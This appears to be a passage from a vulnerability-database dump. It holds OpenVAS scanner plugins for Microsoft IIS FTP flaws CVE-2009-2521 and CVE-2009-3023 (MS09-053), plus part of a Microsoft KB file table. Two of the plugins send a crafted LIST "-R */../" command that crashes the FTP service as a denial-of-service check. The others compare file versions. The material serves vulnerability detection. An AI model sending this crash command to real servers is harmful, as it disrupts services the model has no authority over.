script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"ftp_func.inc\");\ninclude(\"version_func.inc\");\n\nftpPort = get_kb_item(\"Services/ftp\");\nif(!ftpPort){\n ftpPort = 21;\n}\n\nif(!get_port_state(ftpPort)) {\n exit(0);\n}\n\nbanner = get_ftp_banner(port:ftpPort);\nif(\"Microsoft FTP Service\" >!< banner) {\n exit(0);\n}\n\nif(!safe_checks())\n{\n soc = open_sock_tcp(ftpPort);\n if(!soc) {\n exit(0);\n }\n\n login = get_kb_item(\"ftp/login\");\n if(!login){\n login = \"anonymous\";\n }\n pass = get_kb_item(\"ftp/password\");\n if(!pass){\n pass = \"anonymous\";\n }\n\n if(ftp_authenticate(socket:soc, user: login, pass: pass))\n {\n cmd = 'LIST \"-R */../\"\\r\\n';\t# The IIS server crashes and restarted.\n send(socket:soc, data:cmd);\n sleep(10);\n buff = recv(socket:soc, length:1024);\n\n ecmd = 'LIST\\r\\n';\n send(socket:soc, data:ecmd);\n eresp = recv(socket:soc, length:1024);\n if(\"Can't open data connection\" >< eresp){\n security_message(ftpPort);\n }\n }\n close(soc);\n}\n", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-01-08T14:05:35", "bulletinFamily": "scanner", "description": "The host is running Microsoft IIS with FTP server and\n is prone to Denial of Service vulnerability.", "modified": "2020-01-07T00:00:00", "published": "2009-09-18T00:00:00", "id": "OPENVAS:1361412562310900944", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900944", "title": "Microsoft IIS FTP Server 'ls' Command DOS Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft IIS FTP Server 'ls' Command DOS Vulnerability\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:ftp_service\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900944\");\n script_version(\"2020-01-07T08:11:35+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-07 08:11:35 +0000 (Tue, 07 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-09-18 08:01:03 +0200 (Fri, 18 Sep 2009)\");\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2009-2521\");\n script_bugtraq_id(36273);\n script_name(\"Microsoft IIS FTP Server 'ls' Command DOS Vulnerability\");\n script_xref(name:\"URL\", value:\"http://www.microsoft.com/technet/security/advisory/975191.mspx\");\n script_xref(name:\"URL\", value:\"http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html\");\n script_xref(name:\"URL\", value:\"http://blogs.technet.com/msrc/archive/2009/09/01/microsoft-security-advisory-975191-released.aspx\");\n script_xref(name:\"URL\", value:\"http://blogs.technet.com/msrc/archive/2009/09/03/microsoft-security-advisory-975191-revised.aspx\");\n\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_ms_iis_ftpd_detect.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_mandatory_keys(\"MS/IIS-FTP/Installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allows remote authenticated users to crash the\n application leading to denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Information Services version 5.0 and 6.0\");\n\n script_tag(name:\"insight\", value:\"A stack consumption error occurs in the FTP server while processing crafted\n LIST command containing a wildcard that references a subdirectory followed by\n a .. (dot dot).\");\n\n script_tag(name:\"solution\", value:\"Upgrade to IIS version 7.5\");\n\n script_tag(name:\"summary\", value:\"The host is running Microsoft IIS with FTP server and\n is prone to Denial of Service vulnerability.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!ftpPort = get_app_port(cpe:CPE, service:\"ftp\"))\n exit(0);\n\nif(!get_app_location(port:ftpPort, cpe:CPE))\n exit(0);\n\nsoc = open_sock_tcp(ftpPort);\nif(!soc)\n exit(0);\n\nkb_creds = ftp_get_kb_creds();\nlogin = kb_creds[\"login\"];\npass = kb_creds[\"pass\"];\n\nif(ftp_authenticate(socket:soc, user:login, pass:pass)) {\n\n cmd = 'LIST \"-R */../\"\\r\\n'; # The IIS server crashes and restarted.\n send(socket:soc, data:cmd);\n sleep(10);\n buff = recv(socket:soc, length:1024);\n\n ecmd = 'LIST\\r\\n';\n send(socket:soc, data:ecmd);\n eresp = recv(socket:soc, length:1024);\n if(\"Can't open data connection\" >< eresp){\n security_message(port:ftpPort);\n }\n}\n\nclose(soc);\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-01-08T14:05:34", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS09-053.", "modified": "2020-01-07T00:00:00", "published": "2009-10-15T00:00:00", "id": "OPENVAS:1361412562310900874", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900874", "title": "Microsoft IIS FTP Service Remote Code Execution Vulnerabilities (975254)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft IIS FTP Service Remote Code Execution Vulnerabilities (975254)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Updated By: Madhuri D <dmadhuri@secpod.com> on 2010-11-25\n# - To detect file version 'ftpsvc2.dll' on vista and win 2008\n#\n# Updated Updated By: Antu Sanadi <santu@secpod.com> on 2012-06-05\n# - Updated to support GDR and LDR versions.\n# - Removed get_file_version function.\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900874\");\n script_version(\"2020-01-07T09:06:32+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-07 09:06:32 +0000 (Tue, 07 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-10-15 15:35:39 +0200 (Thu, 15 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-2521\", \"CVE-2009-3023\");\n script_bugtraq_id(36273, 36189);\n script_name(\"Microsoft IIS FTP Service Remote Code Execution Vulnerabilities (975254)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/registry_enumerated\");\n\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/975254\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/2542\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/2481\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-053\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the attacker execute arbitrary code with\n SYSTEM privileges which may result Denial of Service on the affected server.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Information Server (IIS) 5.0/5/1/6.0\");\n\n script_tag(name:\"insight\", value:\"- This issue is caused by an error when processing directory listing commands\n including the '*' character and '../' sequences, which could be exploited to exhaust the stack.\n\n - An heap-based buffer overflow error occurs in the FTP service when processing\n a specially crafted 'NLST' command.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS09-053.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2k:5, win2003:3, winVista:3, win2008:3) <= 0){\n exit(0);\n}\n\n# MS09-053 Hotfix check\nif((hotfix_missing(name:\"975254\") == 0)){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\inetsrv\\ftpsvc2.dll\");\nif(!dllVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win2k:5) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"5.0.2195.7336\"))\n {\n security_message(21);\n exit(0);\n }\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.2600.3624\")){\n security_message(21);\n }\n exit(0);\n }\n else if(\"Service Pack 3\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.2600.5875\")){\n security_message(21);\n }\n exit(0);\n }\n security_message(21);\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.3790.4584\")){\n security_message(21);\n }\n exit(0);\n }\n security_message(21);\n}\n\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"7.0.6000.16000\", test_version2:\"7.0.6000.16922\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6000.20000\", test_version2:\"7.0.6000.21122\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(!SP){\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n }\n\n if(\"Service Pack 1\" >< SP)\n {\n if(version_in_range(version:dllVer, test_version:\"7.0.6001.18000\", test_version2:\"7.0.6001.18326\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6001.22000\", test_version2:\"7.0.6001.22515\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n\n if(\"Service Pack 1\" >< SP)\n {\n if(version_in_range(version:dllVer, test_version:\"7.0.6002.18000\", test_version2:\"7.0.6002.18106\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6002.22000\", test_version2:\"7.0.6002.22218\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:56:17", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS09-053.", "modified": "2017-07-07T00:00:00", "published": "2009-10-15T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=900874", "id": "OPENVAS:900874", "title": "Microsoft IIS FTP Service Remote Code Execution Vulnerabilities (975254)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms09-053.nasl 6605 2017-07-07 11:22:07Z cfischer $\n#\n# Microsoft IIS FTP Service Remote Code Execution Vulnerabilities (975254)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Updated By: Madhuri D <dmadhuri@secpod.com> on 2010-11-25\n# - To detect file version 'ftpsvc2.dll' on vista and win 2008\n#\n# Updated Updated By: Antu Sanadi <santu@secpod.com> on 2012-06-05\n# - Updated to support GDR and LDR versions.\n# - Removed get_file_version function.\n# \n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let the attacker execute arbitrary code with\n SYSTEM privileges which may result Denial of Service on the affected server.\n Impact Level: System/Application.\";\ntag_affected = \"Microsoft Internet Information Server (IIS) 5.0/5/1/6.0\";\ntag_insight = \"- This issue is caused by an error when processing directory listing commands\n including the '*' character and '../' sequences, which could be exploited\n to exhaust the stack.\n - An heap-based buffer overflow error occurs in the FTP service when processing\n a specially crafted 'NLST' command.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link.\n http://technet.microsoft.com/en-us/security/bulletin/MS09-053\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS09-053.\";\n\nif(description)\n{\n script_id(900874);\n script_version(\"$Revision: 6605 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 13:22:07 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-15 15:35:39 +0200 (Thu, 15 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-2521\", \"CVE-2009-3023\");\n script_bugtraq_id(36273, 36189);\n script_name(\"Microsoft IIS FTP Service Remote Code Execution Vulnerabilities (975254)\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/975254\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2009/2542\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2009/2481\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/MS09-053\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\", \"secpod_ms_iis_ftpd_detect.nasl\");\n script_mandatory_keys(\"MS/IIS-FTP/Installed\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"MS/IIS-FTP/Installed\")){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4, win2k:5, win2003:3, winVista:3, win2008:3) <= 0){\n exit(0);\n}\n\n# MS09-053 Hotfix check\nif((hotfix_missing(name:\"975254\") == 0)){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\ndllVer = fetch_file_version(sysPath, file_name:\"system32\\inetsrv\\ftpsvc2.dll\");\nif(!dllVer){\n exit(0);\n}\n\n# Windows 2K\nif(hotfix_check_sp(win2k:5) > 0)\n{ \n # Grep for ftpsvc2.dll version < 5.0.2195.7336\n if(version_is_less(version:dllVer, test_version:\"5.0.2195.7336\"))\n {\n security_message(21);\n exit(0);\n }\n}\n\n# Windows XP\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for ftpsvc2.dll < 6.0.2600.3624\n if(version_is_less(version:dllVer, test_version:\"6.0.2600.3624\")){\n security_message(21);\n }\n exit(0);\n }\n else if(\"Service Pack 3\" >< SP)\n {\n # Grep for ftpsvc2.dll < 6.0.2600.5875\n if(version_is_less(version:dllVer, test_version:\"6.0.2600.5875\")){\n security_message(21);\n }\n exit(0);\n }\n security_message(21);\n}\n\n# Windows 2003\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for ftpsvc2.dll version < 6.0.3790.4584\n if(version_is_less(version:dllVer, test_version:\"6.0.3790.4584\")){\n security_message(21);\n }\n exit(0);\n }\n security_message(21);\n}\n\n# Windows Vista\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n ## Check for the Vista and server 2008 without SP\n if(version_in_range(version:dllVer, test_version:\"7.0.6000.16000\", test_version2:\"7.0.6000.16922\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6000.20000\", test_version2:\"7.0.6000.21122\"))\n {\n security_message(0);\n exit(0);\n }\n\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(!SP){\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n }\n\n if(\"Service Pack 1\" >< SP)\n {\n if(version_in_range(version:dllVer, test_version:\"7.0.6001.18000\", test_version2:\"7.0.6001.18326\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6001.22000\", test_version2:\"7.0.6001.22515\"))\n {\n security_message(0);\n exit(0);\n }\n }\n\n if(\"Service Pack 1\" >< SP)\n {\n if(version_in_range(version:dllVer, test_version:\"7.0.6002.18000\", test_version2:\"7.0.6002.18106\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6002.22000\", test_version2:\"7.0.6002.22218\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mskb": [{"lastseen": "2019-08-22T18:21:33", "bulletinFamily": "microsoft", "description": "<html><body><p>Resolves vulnerabilities in the FTP Service in Internet Information Services (IIS) 5.0, IIS 5.1, IIS 6.0, and IIS 7.0.</p><h2></h2><div class=\"kb-notice-section section\"><span class=\"text-base\">Support for Windows Vista Service Pack 1 (SP1) ends on July 12, 2011. To continue receiving security updates for Windows, make sure you're running Windows Vista with Service Pack 2 (SP2). For more information, refer to this Microsoft web page: <a href=\"http://windows.microsoft.com/en-us/windows/help/end-support-windows-xp-sp2-windows-vista-without-service-packs\" id=\"kb-link-1\" target=\"_self\">Support is ending for some versions of Windows</a></span>.</div><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS09-053. To view the complete security bulletin, visit one of the following Microsoft Web sites:<br/><ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/security/updates/bulletins/200910.aspx\" id=\"kb-link-2\" target=\"_self\">http://www.microsoft.com/security/updates/bulletins/200910.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update Web site now:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate\" id=\"kb-link-3\" target=\"_self\">http://update.microsoft.com/microsoftupdate</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/bulletin/ms09-053.mspx\" id=\"kb-link-4\" target=\"_self\">http://www.microsoft.com/technet/security/bulletin/MS09-053.mspx</a></div></li></ul><span><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> <br/>Help installing updates: <br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-5\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-6\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-7\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-8\" target=\"_self\">International Support</a><br/><br/></span></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues with this security update</h3>You can install the security update on a computer that is not running an affected version of FTP. When you do this, FTP is not installed on the computer. However, if the FTP service is installed on the computer in the future, Windows Update will reoffer the update, and you will have to install the update on the computer.</div><h2>FILE INFORMATION</h2><div class=\"kb-summary-section section\"><a class=\"bookmark\" id=\"fileinfo\"></a>The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time and with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.<br/><br/><h3 class=\"sbody-h3\">Windows 2000 file information</h3><h4 class=\"sbody-h4\">For all supported editions of Microsoft Windows 2000 Service Pack 4</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">5.0.2195.7336</td><td class=\"sbody-td\">05-Sep-2009</td><td class=\"sbody-td\">19:05</td><td class=\"sbody-td\">118,544</td></tr></table></div><h3 class=\"sbody-h3\">Windows XP and Windows Server 2003 file information</h3><ul class=\"sbody-free_list\"><li>The files that apply to a specific service branch (QFE, GDR) are noted in the \"Service branch\" column.</li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. QFE service branches contain hotfixes in addition to widely released fixes.</li><li>In addition to the files that are listed in these tables, this software update also installs an associated security catalog file (KB<strong class=\"sbody-strong\">number</strong>.cat) that is signed with a Microsoft digital signature.</li></ul><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows XP</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">6.0.2600.3624</td><td class=\"sbody-td\">06-Sep-2009</td><td class=\"sbody-td\">07:23</td><td class=\"sbody-td\">126,976</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">6.0.2600.3624</td><td class=\"sbody-td\">06-Sep-2009</td><td class=\"sbody-td\">06:59</td><td class=\"sbody-td\">126,976</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">6.0.2600.5875</td><td class=\"sbody-td\">06-Sep-2009</td><td class=\"sbody-td\">07:09</td><td class=\"sbody-td\">126,976</td><td class=\"sbody-td\">SP3GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">6.0.2600.5875</td><td class=\"sbody-td\">06-Sep-2009</td><td class=\"sbody-td\">07:16</td><td class=\"sbody-td\">126,976</td><td class=\"sbody-td\">SP3QFE</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x64-based versions of Windows Server 2003 and of Windows XP Professional x64 edition</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th><th class=\"sbody-th\">CPU</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">6.0.3790.4584</td><td class=\"sbody-td\">06-Sep-2009</td><td class=\"sbody-td\">09:47</td><td class=\"sbody-td\">179,712</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">6.0.3790.4584</td><td class=\"sbody-td\">06-Sep-2009</td><td class=\"sbody-td\">09:43</td><td class=\"sbody-td\">179,712</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">SP2QFE</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows Server 2003</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">6.0.3790.4584</td><td class=\"sbody-td\">06-Sep-2009</td><td class=\"sbody-td\">07:46</td><td class=\"sbody-td\">128,512</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">6.0.3790.4584</td><td class=\"sbody-td\">06-Sep-2009</td><td class=\"sbody-td\">08:12</td><td class=\"sbody-td\">128,512</td><td class=\"sbody-td\">SP2QFE</td></tr></table></div><h4 class=\"sbody-h4\">For all supported IA-64-based versions of Windows Server 2003</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th><th class=\"sbody-th\">CPU</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">6.0.3790.4584</td><td class=\"sbody-td\">06-Sep-2009</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">339,968</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">6.0.3790.4584</td><td class=\"sbody-td\">06-Sep-2009</td><td class=\"sbody-td\">09:43</td><td class=\"sbody-td\">340,480</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2QFE</td></tr></table></div><h3 class=\"sbody-h3\">Windows Vista and Windows Server 2008 file information</h3><ul class=\"sbody-free_list\"><li>The files that apply to a specific product, milestone (RTM, SP<strong class=\"sbody-strong\">n</strong>), and service branch (LDR, GDR) can be identified by examining the file version numbers as shown in the following table:<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Version</span></td><td class=\"sbody-td\"><span class=\"text-base\">Product</span></td><td class=\"sbody-td\"><span class=\"text-base\">Milestone</span></td><td class=\"sbody-td\"><span class=\"text-base\">Service branch</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">0</span>.<span class=\"text-base\">16</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista</td><td class=\"sbody-td\">RTM</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">0</span>.<span class=\"text-base\">20</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista</td><td class=\"sbody-td\">RTM</td><td class=\"sbody-td\">LDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">1</span>.<span class=\"text-base\">18</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista SP1 and Windows Server 2008 SP1</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">1</span>.<span class=\"text-base\">22</span><strong 